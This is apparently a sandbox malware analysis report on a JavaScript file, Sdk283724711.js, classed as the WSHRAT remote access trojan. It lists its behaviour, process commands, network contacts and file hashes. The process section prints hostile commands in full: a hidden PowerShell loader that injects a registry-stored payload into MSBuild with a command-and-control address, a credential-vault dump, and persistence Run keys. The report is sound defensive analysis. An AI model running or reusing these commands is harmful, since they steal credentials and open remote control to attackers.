Analysis Overview
SHA256
1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb
Threat Level: Known bad
The file Sdk283724711.js was found to be: Known bad.
Malicious Activity Summary
WSHRAT
Nirsoft
NirSoft MailPassView
Blocklisted process makes network request
Drops startup file
Checks computer location settings
Adds Run key to start application
Looks up external IP address via web service
Suspicious use of SetThreadContext
Enumerates physical storage devices
Script User-Agent
Uses Task Scheduler COM API
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Kills process with taskkill
Suspicious use of SetWindowsHookEx
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Suspicious behavior: EnumeratesProcesses
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-09-05 23:43
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2023-09-05 23:43
Reported
2023-09-05 23:45
Platform
win7-20230831-en
Max time kernel
55s
Max time network
154s
Command Line
Signatures
WSHRAT
NirSoft MailPassView
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Nirsoft
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
| N/A | N/A | C:\Windows\System32\wscript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js | C:\Windows\system32\wscript.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js | C:\Windows\System32\wscript.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\system32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\System32\wscript.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3185155662-718608226-894467740-1000\Software\Microsoft\Windows\CurrentVersion\Run\Sdk283724711 = "wscript.exe //B \"C:\\Users\\Admin\\AppData\\Roaming\\Sdk283724711.js\"" | C:\Windows\system32\wscript.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1108 set thread context of 2908 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe |
Enumerates physical storage devices
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
| HTTP User-Agent header | WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | N/A |
| N/A | N/A | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Uses Volume Shadow Copy WMI provider
Uses Volume Shadow Copy service COM API
Processes
C:\Windows\system32\wscript.exe
wscript.exe C:\Users\Admin\AppData\Local\Temp\Sdk283724711.js
C:\Windows\System32\wscript.exe
"C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\Sdk283724711.js"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'test').test;$Abt = [Convert]::FromBase64String($Cli444);$inputz = New-Object System.IO.MemoryStream( , $Abt );[System.IO.MemoryStream] $output = New-Object System.IO.MemoryStream;$gzipStream = New-Object System.IO.Compression.GzipStream $inputz, ([IO.Compression.CompressionMode]::Decompress);$buffer = New-Object byte[](1024);while($true){$read = $gzipStream.Read($buffer, 0, 1024);if ($read -le 0){break;}$output.Write($buffer, 0, $read);};$gzipStream.Close();$inputz.Close();$Out = $output.ToArray();$output.Close();$Out = [Convert]::ToBase64String($Out);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'test' -value $Out -propertytype string -force | out-null;"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$Cli444 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mPluginC').mPluginC;$Cli555 = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'mRunPE').mRunPE;$Abt = [System.Reflection.Assembly]::Load([Convert]::FromBase64String($Cli555)).GetType('k.k.Hackitup').GetMethod('exe').Invoke($null,[object[]] ('MSBuild.exe',[Convert]::FromBase64String($Cli444),'2.59.254.111 2420 \"WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands\" 1'));"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
path 2.59.254.111 2420 "WSHRAT|08BE1090|YETUIZPU|Admin|Microsoft Windows 7 Ultimate |plus|nan-av|false - 5/9/2023|JavaScript-v3.4|NL:Netherlands" 1
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -command [void][Windows.Security.Credentials.PasswordVault,Windows.Security.Credentials,ContentType=WindowsRuntime] $vault = New-Object Windows.Security.Credentials.PasswordVault $vault.RetrieveAll() | % { $_.RetrievePassword();$_ } > "C:\Users\Admin\AppData\Local\Temp\tmp.txt"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c cd "C:\Users\Admin\AppData\Roaming\wshsdk" && C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll > "C:\Users\Admin\AppData\Roaming\wshout"
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe C:\Users\Admin\AppData\Roaming\rundll
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Roaming\cmdc.exe
"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Roaming\cmdc.exe
"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Roaming\cmdc.exe
"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c taskkill /F /IM cmdc.exe
C:\Windows\system32\taskkill.exe
taskkill /F /IM cmdc.exe
C:\Users\Admin\AppData\Roaming\cmdc.exe
"C:\Users\Admin\AppData\Roaming\cmdc.exe" /stext C:\Users\Admin\AppData\Roaming\cmdc.exedata
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c mkdir "C:\Users\Admin\AppData\Roaming\wshlogs"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| US | 8.8.8.8:53 | wshsoft.company | udp |
| SG | 194.59.164.67:80 | wshsoft.company | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
| BG | 2.59.254.111:2420 | 2.59.254.111 | tcp |
Files
C:\Users\Admin\AppData\Roaming\Sdk283724711.js
| MD5 | a577b3a40efbcfb8b749ac033f1a7a71 |
| SHA1 | 2dd22a217b5faec549b6a948a6d1f75c5114c485 |
| SHA256 | 1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb |
| SHA512 | 62eb4a174a8da9cbb5958b0b71d76136a6d52de8a8b54fe2437d714337fdce6f803fba6318f3dee80cc0d8d31119adf7af934833dce9b93b992156b70f4fbde5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js
| MD5 | a577b3a40efbcfb8b749ac033f1a7a71 |
| SHA1 | 2dd22a217b5faec549b6a948a6d1f75c5114c485 |
| SHA256 | 1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb |
| SHA512 | 62eb4a174a8da9cbb5958b0b71d76136a6d52de8a8b54fe2437d714337fdce6f803fba6318f3dee80cc0d8d31119adf7af934833dce9b93b992156b70f4fbde5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sdk283724711.js
| MD5 | a577b3a40efbcfb8b749ac033f1a7a71 |
| SHA1 | 2dd22a217b5faec549b6a948a6d1f75c5114c485 |
| SHA256 | 1d96c9a57ad378deea20d2e275d5cc70692e2fb673d311ff3e101e695cf979eb |
| SHA512 | 62eb4a174a8da9cbb5958b0b71d76136a6d52de8a8b54fe2437d714337fdce6f803fba6318f3dee80cc0d8d31119adf7af934833dce9b93b992156b70f4fbde5 |
memory/2520-12-0x000000001B3F0000-0x000000001B6D2000-memory.dmp
memory/2520-13-0x0000000001F40000-0x0000000001F48000-memory.dmp
memory/2520-14-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
memory/2520-15-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
memory/2520-16-0x00000000027B0000-0x0000000002830000-memory.dmp
memory/2520-17-0x00000000027B0000-0x0000000002830000-memory.dmp
memory/2520-18-0x00000000027B0000-0x0000000002830000-memory.dmp
memory/2520-19-0x00000000027B0000-0x0000000002830000-memory.dmp
memory/2520-20-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | fc4886244d734aa26c4d3c6a3fcfb607 |
| SHA1 | 0f44145749106d7fb956135fb4634b4f4ed37caf |
| SHA256 | 99a7af9f1afca83de515b08b5c10e16be8eb998b2dddfc88e2bc2d13b2ca8eea |
| SHA512 | 5b64fe9eec44db2467f71e3146202a2f613e3345cc367ae36b8d933a34c6dbf356da96fac0e2c53517413cf1bb30b8b9698f2c7a4e487915a2cede451f2ab0a6 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ID1I7UL68HSC7GQZRP3F.temp
| MD5 | fc4886244d734aa26c4d3c6a3fcfb607 |
| SHA1 | 0f44145749106d7fb956135fb4634b4f4ed37caf |
| SHA256 | 99a7af9f1afca83de515b08b5c10e16be8eb998b2dddfc88e2bc2d13b2ca8eea |
| SHA512 | 5b64fe9eec44db2467f71e3146202a2f613e3345cc367ae36b8d933a34c6dbf356da96fac0e2c53517413cf1bb30b8b9698f2c7a4e487915a2cede451f2ab0a6 |
memory/868-26-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
memory/868-27-0x0000000002910000-0x0000000002990000-memory.dmp
memory/868-28-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
memory/868-29-0x0000000002910000-0x0000000002990000-memory.dmp
memory/868-30-0x0000000002910000-0x0000000002990000-memory.dmp
memory/868-31-0x000007FEF50D0000-0x000007FEF5A6D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | fc4886244d734aa26c4d3c6a3fcfb607 |
| SHA1 | 0f44145749106d7fb956135fb4634b4f4ed37caf |
| SHA256 | 99a7af9f1afca83de515b08b5c10e16be8eb998b2dddfc88e2bc2d13b2ca8eea |
| SHA512 | 5b64fe9eec44db2467f71e3146202a2f613e3345cc367ae36b8d933a34c6dbf356da96fac0e2c53517413cf1bb30b8b9698f2c7a4e487915a2cede451f2ab0a6 |
memory/1108-37-0x000000001B330000-0x000000001B612000-memory.dmp
memory/1108-39-0x0000000002290000-0x0000000002298000-memory.dmp
memory/1108-38-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp
memory/1108-40-0x0000000002540000-0x00000000025C0000-memory.dmp
memory/1108-41-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp
memory/1108-42-0x0000000002540000-0x00000000025C0000-memory.dmp
memory/1108-43-0x0000000002540000-0x00000000025C0000-memory.dmp
memory/1108-44-0x0000000002540000-0x00000000025C0000-memory.dmp
memory/1108-45-0x0000000002700000-0x000000000270A000-memory.dmp
memory/2908-48-0x0000000000400000-0x000000000040E000-memory.dmp
memory/2908-49-0x0000000000400000-0x000000000040E000-memory.dmp
memory/2908-51-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2908-52-0x0000000000400000-0x000000000040E000-memory.dmp
memory/2908-50-0x0000000000400000-0x000000000040E000-memory.dmp
memory/2908-47-0x0000000000400000-0x000000000040E000-memory.dmp
memory/2908-46-0x0000000000400000-0x000000000040E000-memory.dmp
memory/2908-57-0x0000000000400000-0x000000000040E000-memory.dmp
memory/1108-55-0x000007FEF5030000-0x000007FEF59CD000-memory.dmp
memory/2908-54-0x0000000000400000-0x000000000040E000-memory.dmp
memory/2908-58-0x00000000744F0000-0x0000000074A9B000-memory.dmp
memory/2908-59-0x00000000744F0000-0x0000000074A9B000-memory.dmp
memory/2908-60-0x0000000000150000-0x0000000000190000-memory.dmp
memory/2908-64-0x00000000744F0000-0x0000000074A9B000-memory.dmp
memory/2908-65-0x0000000000150000-0x0000000000190000-memory.dmp
C:\Users\Admin\AppData\Roaming\wshsdk.zip
| MD5 | d9a63dfd8b73629421bb44bcde09f312 |
| SHA1 | 7855575c12eaee0e734f3901ca1da2931e9b587a |
| SHA256 | 9d5bb028794410fda9d1b3e0f8deb6beee5bd4e1e55340bd375a209c81dc98eb |
| SHA512 | df195c22f7818569cc92e995846ab507caa30f341ac902cc8afe6f06ae4493709e7f80357c91cf14b21e58e2154e0b35f2154d8a313bf36fcff0b72b3a539cf8 |
C:\Users\Admin\AppData\Roaming\wshsdk\Lib\SITE-P~1\adodbapi\test\is64bit.py
| MD5 | ca2cc8e73bbca371935bbc92ed18d567 |
| SHA1 | 1adb458919e842cd78c72b1ff00e5e93cb6ef75e |
| SHA256 | bea3f797921992fda45c19db41e10e3b325bcdd3ea35d35c1fa70535477ad9c1 |
| SHA512 | b63df3bad9272f45ba0f50e2c50aaed7a04eb1b000d5855d9f3a8e5c5f2d381c667b1e9c1e1f03f80584a7941a96992838664ae9dd25e1b8320e026da35b8223 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
| MD5 | fc4886244d734aa26c4d3c6a3fcfb607 |
| SHA1 | 0f44145749106d7fb956135fb4634b4f4ed37caf |
| SHA256 | 99a7af9f1afca83de515b08b5c10e16be8eb998b2dddfc88e2bc2d13b2ca8eea |
| SHA512 | 5b64fe9eec44db2467f71e3146202a2f613e3345cc367ae36b8d933a34c6dbf356da96fac0e2c53517413cf1bb30b8b9698f2c7a4e487915a2cede451f2ab0a6 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/6292-23886-0x000000001B300000-0x000000001B5E2000-memory.dmp
memory/6292-23888-0x000007FEF4B90000-0x000007FEF552D000-memory.dmp
memory/6292-23887-0x0000000002390000-0x0000000002398000-memory.dmp
memory/6292-23889-0x00000000025C0000-0x0000000002640000-memory.dmp
memory/6292-23890-0x000007FEF4B90000-0x000007FEF552D000-memory.dmp
memory/6292-23891-0x00000000025C0000-0x0000000002640000-memory.dmp
memory/6292-23892-0x00000000025C0000-0x0000000002640000-memory.dmp
memory/6292-23893-0x00000000025C0000-0x0000000002640000-memory.dmp
memory/6292-23894-0x000007FEF4B90000-0x000007FEF552D000-memory.dmp
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe
| MD5 | e03cbf90f6ed0c8075e5092621555990 |
| SHA1 | 18ced6a9659a87b7d1458cdb6ce8409219299fc1 |
| SHA256 | 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9 |
| SHA512 | f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d |
C:\Users\Admin\AppData\Roaming\wshsdk\python.exe
| MD5 | e03cbf90f6ed0c8075e5092621555990 |
| SHA1 | 18ced6a9659a87b7d1458cdb6ce8409219299fc1 |
| SHA256 | 4695914575f30e2ffe1807bf6a032eaebe241809abf97f65f161b7d0ff0031c9 |
| SHA512 | f5cc42d9bde2f389310910203e1140fb03e2059a58e392acfe4e355cde33d7e9ac27c178a296def131ad1868dd375db1f0b091f81c772ea924837f3aa691a97d |
C:\Users\Admin\AppData\Roaming\wshsdk\python37.dll
| MD5 | 7f0b34248c228bebc731ef155b50bbff |
| SHA1 | 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44 |
| SHA256 | 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578 |
| SHA512 | fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23 |
\Users\Admin\AppData\Roaming\wshsdk\python37.dll
| MD5 | 7f0b34248c228bebc731ef155b50bbff |
| SHA1 | 67fac3b44b6982a58e9bb6cd20db88f7bc1d0c44 |
| SHA256 | 5de19772b6449a69c2cac3a454d6321fb0c7affc44200ed56b9ec08c38f06578 |
| SHA512 | fdf043f1b3875454e13853ca8754ff8c09431fd8e82d3de1730376175c01f634e1ed585f703e5691b87772ecd952a72c3ecb2a5093dcbda5ce053c0e36d13d23 |
\Users\Admin\AppData\Roaming\wshsdk\vcruntime140.dll
| MD5 | ae96651cfbd18991d186a029cbecb30c |
| SHA1 | 18df8af1022b5cb188e3ee98ac5b4da24ac9c526 |
| SHA256 | 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1 |
| SHA512 | 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7 |
C:\Users\Admin\AppData\Roaming\wshsdk\VCRUNTIME140.dll
| MD5 | ae96651cfbd18991d186a029cbecb30c |
| SHA1 | 18df8af1022b5cb188e3ee98ac5b4da24ac9c526 |
| SHA256 | 1b372f064eacb455a0351863706e6326ca31b08e779a70de5de986b5be8069a1 |
| SHA512 | 42a58c17f63cf0d404896d3b4bb16b2c9270cc2192aa4c9be265ed3970dfc2a4115e1db08f35c39e403b4c918be4ed7d19d2e2e015cb06b33d26a6c6521556e7 |
C:\Users\Admin\AppData\Roaming\wshsdk\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | 41a348f9bedc8681fb30fa78e45edb24 |
| SHA1 | 66e76c0574a549f293323dd6f863a8a5b54f3f9b |
| SHA256 | c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b |
| SHA512 | 8c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204 |
C:\Users\Admin\AppData\Roaming\wshsdk\ucrtbase.DLL
| MD5 | d6326267ae77655f312d2287903db4d3 |
| SHA1 | 1268bef8e2ca6ebc5fb974fdfaff13be5ba7574f |
| SHA256 | 0bb8c77de80acf9c43de59a8fd75e611cc3eb8200c69f11e94389e8af2ceb7a9 |
